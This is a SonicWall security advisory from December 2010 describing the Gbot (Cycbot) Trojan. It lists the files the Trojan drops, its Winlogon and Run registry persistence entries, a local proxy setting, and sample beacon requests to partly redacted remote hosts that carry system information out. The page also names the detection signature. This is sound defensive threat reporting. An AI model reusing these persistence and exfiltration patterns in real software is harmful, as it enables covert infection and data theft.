SonicWall Security Center
Share: Linkedin Share Facebook Like
Back to SonicALERT

Gbot Trojan (Dec 09, 2010)



Description


SonicWALL UTM Research team received reports of a new Trojan that can be used to relay sensitive information to remote hosts and accept remote commands from an attacker. The Trojan will make periodic GET and POST requests to remote servers for pages and files that do not exist. Some parts of the requests contain system information or is encrypted.

The Trojan performs the following activities upon execution:

  • Drops the following three files on the compromised machine:

    • C:\Documents and Settings\User\Application Data\dwm.exe [ Detected as GAV: Cycbot.AA_6 (Trojan) ]
    • C:\Documents and Settings\User\Application Data\Microsoft\conhost.exe [ Detected as GAV: Cycbot.AA_6 (Trojan) ]
    • C:\Documents and Settings\User\Application Data\E6AE.A4A

  • Creates the following registry entries to ensure regular startup:

    • HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon Shell "explorer.exe,C:\Documents and Settings\User\Application Data\dwm.exe"
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost "C:\Documents and Settings\User\Application Data\Microsoft\conhost.exe"

  • Additional registry keys created:

    • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings ProxyServer "http=127.0.0.1:61333"

  • Samples of periodic web requests made by the Trojan:

    screenshot
    GET request to: freeonline{removed}.net
    /images/dating1.jpg?tq=gP4aKydUJoD%2BbLSpPM48HXAm%2BIp7RbMA%2Fj%2FBt%2F4rtL2W%2FTcjYNfHjHjmGehkmxM4tV0CLKqe6ul5HxkjOJVmFn2W7p6qiRuKM2cpy5wV
    67ZN5NyS3oiAzfBfnR82Oj6fiu%2Fhq0R50Za6gQOYeTN%2F3XLpS%2FuvwQ3f6llQ8jWyxwwpBg%2FcIwgI

    GET request to: 136{removed}.com
    /LB5000/CGI-BIN/s.cgi?tq=gHZutDyMv5rJej%2Fia9nrmsl6giWz%2BJZbVyA%3D

    GET request to: zon{removed}.com
    /images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvAp1ujbwvgS917W65rJqlLfgPiWW1cg

    GET request to: pcdoc{removed}.com
    /images/logo-1.jpg?tq=gP4aKydMI5oGWaj6So61fGRfYz7KV8jMqwqKxVRWKZa7fLqVtLymA%2FOn9Itcm1zra2bubThHUef0bm2jztvHVcirw2XGuLsR5u3V%2BorIwuAZQROKs16%2BmEVT3jBx0lWjP%2
    FEmg95AmzFTI18yhLbz8fvGc5zFAt5MlTLKL4RY8T1KL7GEaXaQeV4tnf0paKcyB

    POST request to: xibu{removed}.cn
    /pics/23.jpg?type=g_v53&system={IE Browser Ver}|{OS Ver}|{Language}&id=B0CA268F7F02CA4AE6AE&status=err088_2_0&n=0&extra=0


SonicWALL Gateway AntiVirus provides protection against this threat via following signature:

GAV: Cycbot.AA_6 (Trojan)



Back to top

Back to SonicALERT

Follow: Follow us on Facebook Follow us on Twitter Join the Conversation
#SonicWall
© 2017 SonicWall | Privacy Policy | Conditions for use | Feedback | Live Demo | SonicALERT | Document Library | Report Issues
Version: 13.1 | S2MSW02